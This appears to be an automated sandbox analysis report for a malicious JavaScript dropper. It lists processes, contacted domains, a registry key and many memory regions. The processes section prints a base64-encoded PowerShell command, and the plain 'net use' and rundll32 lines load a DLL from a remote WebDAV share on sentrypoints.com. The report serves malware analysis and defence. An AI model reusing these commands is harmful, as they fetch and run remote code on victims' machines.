Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
608017382513614877.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivyjj3rw.lcs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmotzj0i.nna.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\608017382513614877.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://sentrypoints.com:8888/o
|
unknown
|
||
|
http://sentrypoints.com:8888/R
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://sentrypoints.com:8888/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
sentrypoints.com
|
unknown
|
|
|
|
s-part-0017.t-0009.t-msedge.net
|
13.107.246.45
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
24CF2ED7000
|
heap
|
page read and write
|
||
|
7FF886EC1000
|
trusted library allocation
|
page read and write
|
||
|
261D54C0000
|
heap
|
page read and write
|
||
|
24CF1485000
|
heap
|
page read and write
|
||
|
28E672A1000
|
heap
|
page read and write
|
||
|
199FB4BF000
|
heap
|
page read and write
|
||
|
24CF2E91000
|
heap
|
page read and write
|
||
|
28E67250000
|
heap
|
page read and write
|
||
|
261BB700000
|
heap
|
page readonly
|
||
|
24CF16EB000
|
heap
|
page read and write
|
||
|
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
|
24CF2ED3000
|
heap
|
page read and write
|
||
|
261BB5E4000
|
heap
|
page read and write
|
||
|
261BB7E5000
|
heap
|
page read and write
|
||
|
261BD436000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
|
24CF1408000
|
heap
|
page read and write
|
||
|
B6FFBC4000
|
stack
|
page read and write
|
||
|
AA3E3AA000
|
stack
|
page read and write
|
||
|
28E6729B000
|
heap
|
page read and write
|
||
|
24CF2EA3000
|
heap
|
page read and write
|
||
|
199FB3A0000
|
heap
|
page read and write
|
||
|
261BD7E2000
|
trusted library allocation
|
page read and write
|
||
|
28E67280000
|
heap
|
page read and write
|
||
|
24CF2EE1000
|
heap
|
page read and write
|
||
|
24CF147A000
|
heap
|
page read and write
|
||
|
24CF2EBA000
|
heap
|
page read and write
|
||
|
24CF2EB6000
|
heap
|
page read and write
|
||
|
24CF1470000
|
heap
|
page read and write
|
||
|
199FE710000
|
heap
|
page read and write
|
||
|
28E67160000
|
heap
|
page read and write
|
||
|
7FF887000000
|
trusted library allocation
|
page read and write
|
||
|
261CD2E1000
|
trusted library allocation
|
page read and write
|
||
|
261BB4C0000
|
heap
|
page read and write
|
||
|
24CF2EB2000
|
heap
|
page read and write
|
||
|
7FF886D14000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
28E6727B000
|
heap
|
page read and write
|
||
|
28E67248000
|
heap
|
page read and write
|
||
|
24CF2ED8000
|
heap
|
page read and write
|
||
|
24CF2ED5000
|
heap
|
page read and write
|
||
|
28E67271000
|
heap
|
page read and write
|
||
|
261BB460000
|
heap
|
page read and write
|
||
|
7FF886D1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
261BB53E000
|
heap
|
page read and write
|
||
|
28E67370000
|
heap
|
page read and write
|
||
|
261BD812000
|
trusted library allocation
|
page read and write
|
||
|
24CF16EB000
|
heap
|
page read and write
|
||
|
24CF2EC6000
|
heap
|
page read and write
|
||
|
199FE680000
|
heap
|
page read and write
|
||
|
7FF886ED0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CF2EA7000
|
heap
|
page read and write
|
||
|
24CF16EA000
|
heap
|
page read and write
|
||
|
28E67271000
|
heap
|
page read and write
|
||
|
24CF2EB7000
|
heap
|
page read and write
|
||
|
24CF2EC2000
|
heap
|
page read and write
|
||
|
24CF2ECA000
|
heap
|
page read and write
|
||
|
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
|
24CF1440000
|
heap
|
page read and write
|
||
|
24CF2EA6000
|
heap
|
page read and write
|
||
|
7FF886EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CF389D000
|
heap
|
page read and write
|
||
|
24CF3C5E000
|
heap
|
page read and write
|
||
|
261BB6F0000
|
trusted library allocation
|
page read and write
|
||
|
261BB500000
|
heap
|
page read and write
|
||
|
D766FBE000
|
stack
|
page read and write
|
||
|
28E67275000
|
heap
|
page read and write
|
||
|
B6801FE000
|
stack
|
page read and write
|
||
|
28E67280000
|
heap
|
page read and write
|
||
|
261BD6C0000
|
trusted library allocation
|
page read and write
|
||
|
D766FB8000
|
stack
|
page read and write
|
||
|
D766BFE000
|
stack
|
page read and write
|
||
|
261BB544000
|
heap
|
page read and write
|
||
|
24CF1485000
|
heap
|
page read and write
|
||
|
24CF2EEE000
|
heap
|
page read and write
|
||
|
261BD6A8000
|
trusted library allocation
|
page read and write
|
||
|
D766A7D000
|
stack
|
page read and write
|
||
|
261BB546000
|
heap
|
page read and write
|
||
|
28E67365000
|
heap
|
page read and write
|
||
|
261D5516000
|
heap
|
page read and write
|
||
|
7FF886F20000
|
trusted library allocation
|
page read and write
|
||
|
D7671BE000
|
stack
|
page read and write
|
||
|
7FF887030000
|
trusted library allocation
|
page read and write
|
||
|
B6802FF000
|
stack
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
28E67700000
|
remote allocation
|
page read and write
|
||
|
261BB5EE000
|
heap
|
page read and write
|
||
|
D766F36000
|
stack
|
page read and write
|
||
|
24CF3620000
|
heap
|
page read and write
|
||
|
28E672A8000
|
heap
|
page read and write
|
||
|
24CF1464000
|
heap
|
page read and write
|
||
|
D766CFF000
|
stack
|
page read and write
|
||
|
D766EBF000
|
stack
|
page read and write
|
||
|
199FB4A0000
|
heap
|
page read and write
|
||
|
24CF2EA2000
|
heap
|
page read and write
|
||
|
261D547D000
|
heap
|
page read and write
|
||
|
261BB55E000
|
heap
|
page read and write
|
||
|
261D54E0000
|
heap
|
page read and write
|
||
|
261BD5E0000
|
trusted library allocation
|
page read and write
|
||
|
24CF1458000
|
heap
|
page read and write
|
||
|
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
|
2C9C07E000
|
stack
|
page read and write
|
||
|
28E67240000
|
heap
|
page read and write
|
||
|
24CF16EB000
|
heap
|
page read and write
|
||
|
24CF2EE2000
|
heap
|
page read and write
|
||
|
24CF16EA000
|
heap
|
page read and write
|
||
|
24CF145B000
|
heap
|
page read and write
|
||
|
24CF2EEB000
|
heap
|
page read and write
|
||
|
24CF2EC6000
|
heap
|
page read and write
|
||
|
24CF1400000
|
heap
|
page read and write
|
||
|
261BB7F0000
|
heap
|
page read and write
|
||
|
24CF2EAE000
|
heap
|
page read and write
|
||
|
24CF2EAD000
|
heap
|
page read and write
|
||
|
261BB7F5000
|
heap
|
page read and write
|
||
|
24CF1468000
|
heap
|
page read and write
|
||
|
D766DFE000
|
stack
|
page read and write
|
||
|
261BD3EA000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
|
B6806FD000
|
stack
|
page read and write
|
||
|
24CF2EAF000
|
heap
|
page read and write
|
||
|
261BD787000
|
trusted library allocation
|
page read and write
|
||
|
261BB512000
|
heap
|
page read and write
|
||
|
24CF145D000
|
heap
|
page read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
28E67360000
|
heap
|
page read and write
|
||
|
24CF1440000
|
heap
|
page read and write
|
||
|
261D553D000
|
heap
|
page read and write
|
||
|
28E67700000
|
remote allocation
|
page read and write
|
||
|
24CF1360000
|
heap
|
page read and write
|
||
|
24CF142C000
|
heap
|
page read and write
|
||
|
261BD42F000
|
trusted library allocation
|
page read and write
|
||
|
24CF38AD000
|
heap
|
page read and write
|
||
|
24CF2EEA000
|
heap
|
page read and write
|
||
|
24CF2ED5000
|
heap
|
page read and write
|
||
|
D766B7F000
|
stack
|
page read and write
|
||
|
261BD3DD000
|
trusted library allocation
|
page read and write
|
||
|
24CF2EC6000
|
heap
|
page read and write
|
||
|
28E6729D000
|
heap
|
page read and write
|
||
|
199FB4DF000
|
heap
|
page read and write
|
||
|
D7672BB000
|
stack
|
page read and write
|
||
|
2C9BD9D000
|
stack
|
page read and write
|
||
|
261BB6D0000
|
trusted library allocation
|
page read and write
|
||
|
24CF14B3000
|
heap
|
page read and write
|
||
|
261CD34F000
|
trusted library allocation
|
page read and write
|
||
|
261D5510000
|
heap
|
page read and write
|
||
|
2C9C0FF000
|
stack
|
page read and write
|
||
|
24CF2EBE000
|
heap
|
page read and write
|
||
|
28E67280000
|
heap
|
page read and write
|
||
|
7FF886DC6000
|
trusted library allocation
|
page read and write
|
||
|
D7667E3000
|
stack
|
page read and write
|
||
|
7FF887020000
|
trusted library allocation
|
page read and write
|
||
|
24CF2EB3000
|
heap
|
page read and write
|
||
|
24CF2EDE000
|
heap
|
page read and write
|
||
|
24CF2EAD000
|
heap
|
page read and write
|
||
|
24CF2EC6000
|
heap
|
page read and write
|
||
|
D76723E000
|
stack
|
page read and write
|
||
|
24CF2EE3000
|
heap
|
page read and write
|
||
|
24CF2EC6000
|
heap
|
page read and write
|
||
|
261BD368000
|
trusted library allocation
|
page read and write
|
||
|
261BD3E3000
|
trusted library allocation
|
page read and write
|
||
|
B6FFEFE000
|
stack
|
page read and write
|
||
|
AA3E67E000
|
stack
|
page read and write
|
||
|
199FB740000
|
heap
|
page read and write
|
||
|
199FB4CD000
|
heap
|
page read and write
|
||
|
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
|
D76713F000
|
stack
|
page read and write
|
||
|
7FF886F50000
|
trusted library allocation
|
page read and write
|
||
|
D7670BE000
|
stack
|
page read and write
|
||
|
28E6727D000
|
heap
|
page read and write
|
||
|
199FB4BE000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D12000
|
trusted library allocation
|
page read and write
|
||
|
24CF1350000
|
heap
|
page read and write
|
||
|
24CF2ECB000
|
heap
|
page read and write
|
||
|
261BD3DA000
|
trusted library allocation
|
page read and write
|
||
|
24CF2EE7000
|
heap
|
page read and write
|
||
|
199FB4E7000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
24CF146C000
|
heap
|
page read and write
|
||
|
28E67280000
|
heap
|
page read and write
|
||
|
24CF2EAA000
|
heap
|
page read and write
|
||
|
24CF3623000
|
heap
|
page read and write
|
||
|
261BD2E1000
|
trusted library allocation
|
page read and write
|
||
|
24CF2EC6000
|
heap
|
page read and write
|
||
|
7FF886DCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
261D5630000
|
heap
|
page read and write
|
||
|
261BB540000
|
heap
|
page read and write
|
||
|
261BB730000
|
heap
|
page execute and read and write
|
||
|
261D5730000
|
heap
|
page read and write
|
||
|
24CF2EEE000
|
heap
|
page read and write
|
||
|
261D547B000
|
heap
|
page read and write
|
||
|
24CF1485000
|
heap
|
page read and write
|
||
|
24CF1469000
|
heap
|
page read and write
|
||
|
261BB7E0000
|
heap
|
page read and write
|
||
|
24CF3060000
|
heap
|
page read and write
|
||
|
24CF2EEE000
|
heap
|
page read and write
|
||
|
199FB5A0000
|
heap
|
page read and write
|
||
|
24CF2EDE000
|
heap
|
page read and write
|
||
|
B6803FE000
|
stack
|
page read and write
|
||
|
261BB542000
|
heap
|
page read and write
|
||
|
24CF16E5000
|
heap
|
page read and write
|
||
|
24CF2EE7000
|
heap
|
page read and write
|
||
|
24CF1479000
|
heap
|
page read and write
|
||
|
24CF2EAB000
|
heap
|
page read and write
|
||
|
24CF33B1000
|
heap
|
page read and write
|
||
|
261BD2FB000
|
trusted library allocation
|
page read and write
|
||
|
B6804FF000
|
stack
|
page read and write
|
||
|
AA3E87F000
|
stack
|
page read and write
|
||
|
199FB4CA000
|
heap
|
page read and write
|
||
|
7FF886F10000
|
trusted library allocation
|
page read and write
|
||
|
24CF2EB5000
|
heap
|
page read and write
|
||
|
24CF2EAD000
|
heap
|
page read and write
|
||
|
D766C7C000
|
stack
|
page read and write
|
||
|
24CF2ED5000
|
heap
|
page read and write
|
||
|
24CF1485000
|
heap
|
page read and write
|
||
|
24CF145A000
|
heap
|
page read and write
|
||
|
24CF2EA1000
|
heap
|
page read and write
|
||
|
B6805FE000
|
stack
|
page read and write
|
||
|
28E67295000
|
heap
|
page read and write
|
||
|
261BD33F000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D13000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CF2ED5000
|
heap
|
page read and write
|
||
|
24CF2ED2000
|
heap
|
page read and write
|
||
|
199FB4D2000
|
heap
|
page read and write
|
||
|
261BD3E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EF2000
|
trusted library allocation
|
page read and write
|
||
|
B6FFFFE000
|
stack
|
page read and write
|
||
|
7FF886DF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CF16E0000
|
heap
|
page read and write
|
||
|
24CF1460000
|
heap
|
page read and write
|
||
|
24CF1380000
|
heap
|
page read and write
|
||
|
199FB4BA000
|
heap
|
page read and write
|
||
|
261D5650000
|
heap
|
page read and write
|
||
|
28E672A2000
|
heap
|
page read and write
|
||
|
261D5A10000
|
heap
|
page read and write
|
||
|
261BB450000
|
heap
|
page read and write
|
||
|
261BB7D0000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CF2EA0000
|
heap
|
page read and write
|
||
|
199FB4A8000
|
heap
|
page read and write
|
||
|
24CF2ED5000
|
heap
|
page read and write
|
||
|
D76703B000
|
stack
|
page read and write
|
||
|
261D5440000
|
heap
|
page read and write
|
||
|
199FB745000
|
heap
|
page read and write
|
||
|
199FB74B000
|
heap
|
page read and write
|
||
|
AA3E7FE000
|
stack
|
page read and write
|
||
|
7FF886ECA000
|
trusted library allocation
|
page read and write
|
||
|
D766AFE000
|
stack
|
page read and write
|
||
|
261CD2EF000
|
trusted library allocation
|
page read and write
|
||
|
261D5556000
|
heap
|
page execute and read and write
|
||
|
7FF886EB0000
|
trusted library allocation
|
page read and write
|
||
|
261BB710000
|
trusted library allocation
|
page read and write
|
||
|
28E672A8000
|
heap
|
page read and write
|
||
|
261BD764000
|
trusted library allocation
|
page read and write
|
||
|
261D5494000
|
heap
|
page read and write
|
||
|
24CF2EA1000
|
heap
|
page read and write
|
||
|
24CF2EB5000
|
heap
|
page read and write
|
||
|
199FCEF0000
|
heap
|
page read and write
|
||
|
7DF42D680000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E67295000
|
heap
|
page read and write
|
||
|
24CF146F000
|
heap
|
page read and write
|
||
|
7FF887010000
|
trusted library allocation
|
page read and write
|
||
|
B6808FB000
|
stack
|
page read and write
|
||
|
D766D7E000
|
stack
|
page read and write
|
||
|
199FB480000
|
heap
|
page read and write
|
||
|
24CF146D000
|
heap
|
page read and write
|
||
|
261BB586000
|
heap
|
page read and write
|
||
|
24CF2ED6000
|
heap
|
page read and write
|
||
|
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
|
2C9BC9A000
|
stack
|
page read and write
|
||
|
28E672A8000
|
heap
|
page read and write
|
||
|
261D55F0000
|
heap
|
page execute and read and write
|
||
|
28E6727B000
|
heap
|
page read and write
|
||
|
24CF2EEB000
|
heap
|
page read and write
|
||
|
AA3E77B000
|
stack
|
page read and write
|
||
|
7FF886F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
24CF2ED5000
|
heap
|
page read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
2C9BD1E000
|
stack
|
page read and write
|
||
|
24CF2EAD000
|
heap
|
page read and write
|
||
|
261BB480000
|
heap
|
page read and write
|
||
|
D766E79000
|
stack
|
page read and write
|
||
|
199FEC50000
|
trusted library allocation
|
page read and write
|
||
|
199FB4B6000
|
heap
|
page read and write
|
||
|
24CF2EBF000
|
heap
|
page read and write
|
||
|
28E6726A000
|
heap
|
page read and write
|
||
|
199FB4C3000
|
heap
|
page read and write
|
||
|
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
|
261BD3E7000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F40000
|
trusted library allocation
|
page read and write
|
||
|
AA3E6FF000
|
stack
|
page read and write
|
||
|
261D54F3000
|
heap
|
page read and write
|
||
|
28E6726D000
|
heap
|
page read and write
|
||
|
28E67700000
|
remote allocation
|
page read and write
|
||
|
199FE713000
|
heap
|
page read and write
|
||
|
24CF16EE000
|
heap
|
page read and write
|
||
|
28E67340000
|
heap
|
page read and write
|
||
|
261D5550000
|
heap
|
page execute and read and write
|
||
|
28E6726D000
|
heap
|
page read and write
|
There are 289 hidden memdumps, click here to show them.